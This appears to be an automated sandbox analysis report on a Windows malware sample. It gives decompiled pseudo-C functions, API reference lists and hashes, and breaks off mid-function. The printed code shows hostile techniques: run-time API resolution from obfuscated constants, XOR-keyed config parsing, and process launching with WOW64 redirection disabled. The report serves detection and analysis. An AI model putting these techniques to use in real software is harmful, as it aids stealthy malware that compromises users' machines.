Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
String ID: Ut
API String ID: 1837416118-8415677
Opcode ID: 12d4f03e54bd1f717b285187c2823437f1dde78cfeb5e8bfb244dfc3f67d17f9
Instruction ID: c65f4d776bce0f5fde5f2f6b302a03873336e438c2c5bb7fae707cbf42c7f49a
Opcode Fuzzy Hash: 12d4f03e54bd1f717b285187c2823437f1dde78cfeb5e8bfb244dfc3f67d17f9
Instruction Fuzzy Hash: 52716F71504218AFDB22DB78EC88E5677ECFB88710B150516F959C3231D73AE909FBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00F97836, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00F97836(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t43;
				intOrPtr _t50;
				void* _t52;
				intOrPtr _t53;
				void* _t61;
				intOrPtr* _t66;
				intOrPtr* _t73;
				intOrPtr* _t76;

				_t1 = __eax + 0x14; // 0x74183966
				_t71 =  *_t1;
				_t39 = E00F971A3(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				E00F97973( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
				_t43 = _v12(_v12);
				_v8 = _t43;
				if(_t43 == 0 && ( *0xf9a2b8 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t50 =  *0xf9a2d0; // 0x310d5a8
					_t18 = _t50 + 0xf9b55b; // 0x73797325
					_t52 = E00F91000(_t18);
					_v12 = _t52;
					if(_t52 == 0) {
						_v8 = 8;
					} else {
						_t53 =  *0xf9a2d0; // 0x310d5a8
						_t20 = _t53 + 0xf9b73d; // 0x40a8ce5
						_t21 = _t53 + 0xf9b0af; // 0x4e52454b
						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t66 == 0) {
							_v8 = 0x7f;
						} else {
							_t73 = __imp__;
							_v108 = 0x44;
							 *_t73(0);
							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
							 *_t73(1);
							if(_t61 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0xf9a290, 0, _v12);
					}
				}
				_t76 = _v16;
				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
				E00F92A03(_t76);
				goto L12;
			}

0x00f9783f
0x00f9783f
0x00f9784d
0x00f97856
0x00f97859
0x00f9796b
0x00f97972
0x00f97972
0x00f97868
0x00f97870
0x00f97875
0x00f97878
0x00f9788d
0x00f97893
0x00f97894
0x00f97897
0x00f9789d
0x00f978a0
0x00f978a5
0x00f978ad
0x00f978b4
0x00f978bb
0x00f978be
0x00f97952
0x00f978c4
0x00f978c4
0x00f978c9
0x00f978d0
0x00f978e4
0x00f978e8
0x00f97939
0x00f978ea
0x00f978ea
0x00f978f1
0x00f978f8
0x00f97910
0x00f97916
0x00f9791a
0x00f97934
0x00f9791c
0x00f97925
0x00f9792a
0x00f9792a
0x00f9791a
0x00f9794a
0x00f9794a
0x00f978be
0x00f97959
0x00f97962
0x00f97966
0x00000000

APIs

Part of subcall function 00F971A3: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,00F97852,?,?,?,?,00000000,00000000), ref: 00F971C8
Part of subcall function 00F971A3: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00F971EA
Part of subcall function 00F971A3: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00F97200
Part of subcall function 00F971A3: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00F97216
Part of subcall function 00F971A3: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00F9722C
Part of subcall function 00F971A3: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00F97242

memset.NTDLL ref: 00F978A0

Part of subcall function 00F91000: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,00F94F1C,73797325), ref: 00F91011
Part of subcall function 00F91000: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00F9102B

GetModuleHandleA.KERNEL32(4E52454B,040A8CE5,73797325), ref: 00F978D7
GetProcAddress.KERNEL32(00000000), ref: 00F978DE
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00F978F8
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00F97916
CloseHandle.KERNEL32(00000000), ref: 00F97925
CloseHandle.KERNEL32(?), ref: 00F9792A
GetLastError.KERNEL32 ref: 00F9792E
HeapFree.KERNEL32(00000000,?), ref: 00F9794A

Strings

Ut, xrefs: 00F9794A

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
String ID: Ut
API String ID: 91923200-8415677
Opcode ID: 1bd61c3686326957ee210b4c69794d260720424c4cc88afe2a5b2c2918377412
Instruction ID: 0d1a3137696205d9caf74d12f7ab144235b437514e6c4649481e94f5cfb22691
Opcode Fuzzy Hash: 1bd61c3686326957ee210b4c69794d260720424c4cc88afe2a5b2c2918377412
Instruction Fuzzy Hash: 8F313772904319BFEF11AFE8DC48ADEBFB8EF48350F104056E605A3121D775AA45EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F9762C, Relevance: 13.6, APIs: 9, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E00F9762C(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0xf9a38c; // 0x40a9cd8
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E00F95F43(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0xf991cc;
				}
				_t46 = E00F943FD(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E00F95C4E(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0xf9a2d0; // 0x310d5a8
						_t16 = _t75 + 0xf9bad8; // 0x530025
						 *0xf9a13c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E00F95F43(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0xf991d0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E00F95C4E(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E00F92A03(_v20);
						} else {
							_t66 =  *0xf9a2d0; // 0x310d5a8
							_t31 = _t66 + 0xf9bbf8; // 0x73006d
							 *0xf9a13c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E00F92A03(_v12);
				}
				return _v24;
			}

0x00f97634
0x00f9763a
0x00f97641
0x00f97647
0x00f9764b
0x00f9764f
0x00f97652
0x00f97659
0x00f9765c
0x00f9765e
0x00f9765e
0x00f97667
0x00f9766e
0x00f97671
0x00f97677
0x00f97681
0x00f9768a
0x00f97691
0x00f976aa
0x00f976b1
0x00f976b4
0x00f976bd
0x00f976c6
0x00f976d7
0x00f976e0
0x00f976e4
0x00f976e8
0x00f976ef
0x00f976f2
0x00f976f4
0x00f976f4
0x00f976fe
0x00f97707
0x00f9770e
0x00f97726
0x00f9772a
0x00f97767
0x00f9772c
0x00f9772f
0x00f97737
0x00f97748
0x00f97754
0x00f9775c
0x00f97760
0x00f97760
0x00f9772a
0x00f9776f
0x00f97774
0x00f9777b

APIs

GetTickCount.KERNEL32 ref: 00F97641
lstrlen.KERNEL32(?,80000002,00000005), ref: 00F97681
lstrlen.KERNEL32(00000000), ref: 00F9768A
lstrlen.KERNEL32(00000000), ref: 00F97691
lstrlenW.KERNEL32(80000002), ref: 00F9769E
lstrlen.KERNEL32(?,00000004), ref: 00F976FE
lstrlen.KERNEL32(?), ref: 00F97707
lstrlen.KERNEL32(?), ref: 00F9770E
lstrlenW.KERNEL32(?), ref: 00F97715

Part of subcall function 00F92A03: RtlFreeHeap.NTDLL(00000000,00000000,00F94072,00000000,?,?,00000000,?,?,?,?,?,?,00F944AE,00000000), ref: 00F92A0F

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: 55b83ca47683007247bd12e295df2b9b56e3fa88009c8d59f7edeb04990df635
Instruction ID: 6c538c8feb629d865d6318e6d95333653e452fb248c3576280ac4b6bdd0c15d2
Opcode Fuzzy Hash: 55b83ca47683007247bd12e295df2b9b56e3fa88009c8d59f7edeb04990df635
Instruction Fuzzy Hash: CC414772D00219FBDF11AFA4CD09E9EBBB5EF48318F054095ED04A7221D7369A54FB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F9374B, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 190
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00F9374B(int* __ecx) {
				int _v8;
				void* _v12;
				void* __esi;
				signed int _t20;
				signed int _t25;
				char* _t31;
				char* _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				void* _t36;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				void* _t46;
				void* _t47;
				signed int _t49;
				signed int _t53;
				signed int _t57;
				signed int _t61;
				signed int _t65;
				signed int _t69;
				void* _t74;
				intOrPtr _t90;

				_t75 = __ecx;
				_t20 =  *0xf9a2cc; // 0x63699bc3
				if(E00F93D6B( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x110) {
					 *0xf9a320 = _v12;
				}
				_t25 =  *0xf9a2cc; // 0x63699bc3
				if(E00F93D6B( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
					_push(2);
					_pop(0);
					goto L48;
				} else {
					_t74 = _v12;
					if(_t74 == 0) {
						_t31 = 0;
					} else {
						_t69 =  *0xf9a2cc; // 0x63699bc3
						_t31 = E00F9257B(_t75, _t74, _t69 ^ 0x724e87bc);
					}
					if(_t31 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0xf9a298 = _v8;
						}
					}
					if(_t74 == 0) {
						_t32 = 0;
					} else {
						_t65 =  *0xf9a2cc; // 0x63699bc3
						_t32 = E00F9257B(_t75, _t74, _t65 ^ 0x2b40cc40);
					}
					if(_t32 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0xf9a29c = _v8;
						}
					}
					if(_t74 == 0) {
						_t33 = 0;
					} else {
						_t61 =  *0xf9a2cc; // 0x63699bc3
						_t33 = E00F9257B(_t75, _t74, _t61 ^ 0x3b27c2e6);
					}
					if(_t33 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0xf9a2a0 = _v8;
						}
					}
					if(_t74 == 0) {
						_t34 = 0;
					} else {
						_t57 =  *0xf9a2cc; // 0x63699bc3
						_t34 = E00F9257B(_t75, _t74, _t57 ^ 0x0602e249);
					}
					if(_t34 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
							 *0xf9a004 = _v8;
						}
					}
					if(_t74 == 0) {
						_t35 = 0;
					} else {
						_t53 =  *0xf9a2cc; // 0x63699bc3
						_t35 = E00F9257B(_t75, _t74, _t53 ^ 0x3603764c);
					}
					if(_t35 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
							 *0xf9a02c = _v8;
						}
					}
					if(_t74 == 0) {
						_t36 = 0;
					} else {
						_t49 =  *0xf9a2cc; // 0x63699bc3
						_t36 = E00F9257B(_t75, _t74, _t49 ^ 0x2cc1f2fd);
					}
					if(_t36 != 0) {
						_push(_t36);
						_t46 = 0x10;
						_t47 = E00F95A4E(_t46);
						if(_t47 != 0) {
							_push(_t47);
							E00F9461D();
						}
					}
					if(_t74 == 0) {
						_t37 = 0;
					} else {
						_t44 =  *0xf9a2cc; // 0x63699bc3
						_t37 = E00F9257B(_t75, _t74, _t44 ^ 0xb30fc035);
					}
					if(_t37 != 0 && E00F95A4E(0, _t37) != 0) {
						_t90 =  *0xf9a37c; // 0x40a9630
						E00F96027(_t90 + 4, _t42);
					}
					_t38 =  *0xf9a2d0; // 0x310d5a8
					_t18 = _t38 + 0xf9b2d2; // 0x40a887a
					_t19 = _t38 + 0xf9b7c4; // 0x6976612e
					 *0xf9a31c = _t18;
					 *0xf9a390 = _t19;
					HeapFree( *0xf9a290, 0, _t74);
					L48:
					return 0;
				}
			}

0x00f9374b
0x00f9374e
0x00f9376e
0x00f9377c
0x00f9377c
0x00f93781
0x00f9379b
0x00f9393e
0x00f93940
0x00000000
0x00f937a1
0x00f937a1
0x00f937a8
0x00f937be
0x00f937aa
0x00f937aa
0x00f937b7
0x00f937b7
0x00f937c8
0x00f937ca
0x00f937d4
0x00f937d9
0x00f937d9
0x00f937d4
0x00f937e0
0x00f937f6
0x00f937e2
0x00f937e2
0x00f937ef
0x00f937ef
0x00f937fa
0x00f937fc
0x00f93806
0x00f9380b
0x00f9380b
0x00f93806
0x00f93812
0x00f93828
0x00f93814
0x00f93814
0x00f93821
0x00f93821
0x00f9382c
0x00f9382e
0x00f93838
0x00f9383d
0x00f9383d
0x00f93838
0x00f93844
0x00f9385a
0x00f93846
0x00f93846
0x00f93853
0x00f93853
0x00f9385e
0x00f93860
0x00f9386a
0x00f9386f
0x00f9386f
0x00f9386a
0x00f93876
0x00f9388c
0x00f93878
0x00f93878
0x00f93885
0x00f93885
0x00f93890
0x00f93892
0x00f9389c
0x00f938a1
0x00f938a1
0x00f9389c
0x00f938a8
0x00f938be
0x00f938aa
0x00f938aa
0x00f938b7
0x00f938b7
0x00f938c2
0x00f938c4
0x00f938c7
0x00f938c8
0x00f938cf
0x00f938d1
0x00f938d2
0x00f938d2
0x00f938cf
0x00f938d9
0x00f938ef
0x00f938db
0x00f938db
0x00f938e8
0x00f938e8
0x00f938f3
0x00f93901
0x00f9390b
0x00f9390b
0x00f93910
0x00f93916
0x00f93923
0x00f93929
0x00f9392f
0x00f93934
0x00f93941
0x00f93945
0x00f93945

APIs

StrToIntExA.SHLWAPI(00000000,00000000,00F92F44,?,00F92F44,63699BC3,?,00F92F44,63699BC3,E8FA7DD7,00F9A00C,7691C740,?,?,00F92F44), ref: 00F937D0
StrToIntExA.SHLWAPI(00000000,00000000,00F92F44,?,00F92F44,63699BC3,?,00F92F44,63699BC3,E8FA7DD7,00F9A00C,7691C740,?,?,00F92F44), ref: 00F93802
StrToIntExA.SHLWAPI(00000000,00000000,00F92F44,?,00F92F44,63699BC3,?,00F92F44,63699BC3,E8FA7DD7,00F9A00C,7691C740,?,?,00F92F44), ref: 00F93834
StrToIntExA.SHLWAPI(00000000,00000000,00F92F44,?,00F92F44,63699BC3,?,00F92F44,63699BC3,E8FA7DD7,00F9A00C,7691C740,?,?,00F92F44), ref: 00F93866
StrToIntExA.SHLWAPI(00000000,00000000,00F92F44,?,00F92F44,63699BC3,?,00F92F44,63699BC3,E8FA7DD7,00F9A00C,7691C740,?,?,00F92F44), ref: 00F93898
HeapFree.KERNEL32(00000000,?,?,00F92F44,63699BC3,?,00F92F44,63699BC3,E8FA7DD7,00F9A00C,7691C740,?,?,00F92F44), ref: 00F93934

Strings

Ut, xrefs: 00F93934

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID: Ut
API String ID: 3298025750-8415677
Opcode ID: 2fd1c490ff86c649e4b1d962b6d971c5ab2b749e4e1d03ed47ec457557f92008
Instruction ID: 4e04956c053fd166b278b47c603387ac045c4d9850c4c812576e047524f239e4
Opcode Fuzzy Hash: 2fd1c490ff86c649e4b1d962b6d971c5ab2b749e4e1d03ed47ec457557f92008
Instruction Fuzzy Hash: 785191B2E14108AAEF11EBB9DDC5D6F77EDAB887107280966B401D3214E636DF04FB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F92BF3, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00F92C4F
SysAllocString.OLEAUT32(0070006F), ref: 00F92C63
SysAllocString.OLEAUT32(00000000), ref: 00F92C75
SysFreeString.OLEAUT32(00000000), ref: 00F92CD9
SysFreeString.OLEAUT32(00000000), ref: 00F92CE8
SysFreeString.OLEAUT32(00000000), ref: 00F92CF3

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: a13de98111c99d1b9d3cc6177a7034de269a0a5048efc167e99574f0145d9b02
Instruction ID: 3fedfa2a46b60241ef7e870b7f821a13d9561f05b6fedd1445e39c667616d229
Opcode Fuzzy Hash: a13de98111c99d1b9d3cc6177a7034de269a0a5048efc167e99574f0145d9b02
Instruction Fuzzy Hash: AF316D32D00609ABEF41DFBCD948A9FB7BAAF49310F154425ED10EB220DB759E09DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F971A3, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F971A3(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00F95C4E(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0xf9a2d0; // 0x310d5a8
					_t1 = _t23 + 0xf9b11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0xf9a2d0; // 0x310d5a8
					_t2 = _t26 + 0xf9b787; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00F92A03(_t54);
					} else {
						_t30 =  *0xf9a2d0; // 0x310d5a8
						_t5 = _t30 + 0xf9b774; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0xf9a2d0; // 0x310d5a8
							_t7 = _t33 + 0xf9b797; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0xf9a2d0; // 0x310d5a8
								_t9 = _t36 + 0xf9b756; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0xf9a2d0; // 0x310d5a8
									_t11 = _t39 + 0xf9b7ac; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00F9225C(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x00f971b2
0x00f971b6
0x00f97278
0x00f971bc
0x00f971bc
0x00f971c1
0x00f971d4
0x00f971d6
0x00f971db
0x00f971e3
0x00f971ea
0x00f971ee
0x00f971f1
0x00f97270
0x00f97271
0x00f971f3
0x00f971f3
0x00f971f8
0x00f97200
0x00f97204
0x00f97207
0x00000000
0x00f97209
0x00f97209
0x00f9720e
0x00f97216
0x00f9721a
0x00f9721d
0x00000000
0x00f9721f
0x00f9721f
0x00f97224
0x00f9722c
0x00f97230
0x00f97233
0x00000000
0x00f97235
0x00f97235
0x00f9723a
0x00f97242
0x00f97246
0x00f97249
0x00000000
0x00f9724b
0x00f97251
0x00f97256
0x00f9725d
0x00f97264
0x00f97267
0x00000000
0x00f97269
0x00f9726c
0x00f9726c
0x00f97267
0x00f97249
0x00f97233
0x00f9721d
0x00f97207
0x00f971f1
0x00f97286

APIs

Part of subcall function 00F95C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00F93FAA), ref: 00F95C5A

GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,00F97852,?,?,?,?,00000000,00000000), ref: 00F971C8
GetProcAddress.KERNEL32(00000000,7243775A), ref: 00F971EA
GetProcAddress.KERNEL32(00000000,614D775A), ref: 00F97200
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00F97216
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00F9722C
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00F97242

Part of subcall function 00F9225C: memset.NTDLL ref: 00F922DB

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: f4b9370c0103e60a7d393d6c273d9e2bb84290f69cd93a431d3ea4c04a1b27f4
Instruction ID: 7016e3c6626a2d52e512475db722d3ab821ba13fed7bfe65840afdbbe3477914
Opcode Fuzzy Hash: f4b9370c0103e60a7d393d6c273d9e2bb84290f69cd93a431d3ea4c04a1b27f4
Instruction Fuzzy Hash: 8B2129B151430AAFEF20EFA8DD84E6A77ECEB45350B014156F805C7221E735E909AFB1

Uniqueness

Uniqueness Score: -1.00%

Function 00F913B4, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 152
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00F913B4(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0xf9a2d0; // 0x310d5a8
					_t5 = _t102 + 0xf9b038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0xf992d0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0xf9a2d0; // 0x310d5a8
												_t28 = _t108 + 0xf9b0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0xf9a2d0; // 0x310d5a8
														_t33 = _t78 + 0xf9b078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}

0x00f913b9
0x00f913c2
0x00f913c3
0x00f913c7
0x00f913cd
0x00f913d3
0x00f913dc
0x00f913e2
0x00f913ec
0x00f913ee
0x00f913f4
0x00f913f9
0x00f91404
0x00f9140c
0x00f9140f
0x00f91532
0x00f91415
0x00f91415
0x00f91422
0x00f91428
0x00f9142e
0x00f91432
0x00f91438
0x00f91445
0x00f91449
0x00f9144f
0x00f91452
0x00f91458
0x00f9145e
0x00f91464
0x00f91467
0x00f9146a
0x00f91470
0x00f91479
0x00f9147f
0x00f91480
0x00f91483
0x00f91484
0x00f91485
0x00f9148d
0x00f9148e
0x00f9148f
0x00f91491
0x00f91495
0x00f91499
0x00000000
0x00000000
0x00f9149f
0x00f914a8
0x00f914ae
0x00f914b8
0x00f914bc
0x00f914be
0x00f914cb
